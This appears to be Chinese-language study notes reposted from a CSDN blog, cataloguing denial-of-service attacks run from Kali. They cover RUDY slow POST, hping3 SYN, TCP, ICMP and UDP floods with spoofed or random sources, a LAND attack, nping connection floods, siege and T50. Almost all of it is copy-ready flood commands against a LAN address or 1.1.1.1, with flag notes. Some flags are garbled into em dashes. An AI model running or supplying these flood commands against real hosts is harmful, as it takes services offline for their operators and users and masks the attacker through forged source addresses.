Rudy

  • 慢速应用层HTTP POST攻击,与slowhttptest原理相同
  • 每次只传输一个字节的数据
  • 美剧黑客军团中曾提到此攻击手段
  • 攻击有表单WEB页面,攻击时需指定攻击的参数名称
  • 官网https://sourceforge.net/projects/r-u-dead-yet/

kali:vi rudeadyet.conf
./r-u-dead-yet-v2.2.py #进行攻击

hping3

几乎可以定制发送任何 TCP/IP 数据包,用于测试 FW、端口扫描、性能测试

  1. syn_flood 攻击
  2. hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.119 #-c连接数,-d数据段大小,-S是syn标记,-w是window大小,-p是端口
  3. hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.119 #-P是push标记
  4. tcp_flood 攻击
  5. hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.119 #TCP的标记都标满,就是消耗资源
  6. icmp_flood 攻击
  7. hping3 -q -n -a 1.1.1.1 --icmp -d 200 --flood 192.168.1.119 #-q安静模式,-n不解析域名,-a伪造源地址
  8. udp_flood 攻击
  9. hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 192.168.1.119

LAND攻击

  • 特殊种类的 SYN Flood 攻击
  • 源地址和目的地址都是靶机IP,受害者和自己完成三次握手
  • hping3 -n -a 1.1.1.1 -S -d 100 -p 80 —flood 1.1.1.1

    NPing攻击

    TCP全链接DOS攻击

    nping —tcp-connect —rate=10000 -c 1000000000 -q 1.1.1.1
    查公网IP
    nping —echo-client “public” echo.nmap.org —udp

    Siege

    http/https 压力测试工具,模拟多个用户并发访问请求

    1. siege -g http://192.168.1.119 #-g获取banner,类似nc
    2. siege -i -c 1000 http://192.168.1.119 -A siegehttp #-i是internet模式,-c是用户数量,-A是http头
    3. #同时攻击多个 url ,使用 -f 调用字典文件/etc/siege/urls.txt
    4. siege -i -c 1000 #这样也会调用字典文件

    T50网络压力测试

  • t50 1.1.1.1 —flood —turbo -S —protocol TCP —dport 80

  • t50 1.1.1.1 —flood —turbo -S TCP UDP OSPF EIGRP —dport 22

原文:https://fishpond.blog.csdn.net/article/details/105580720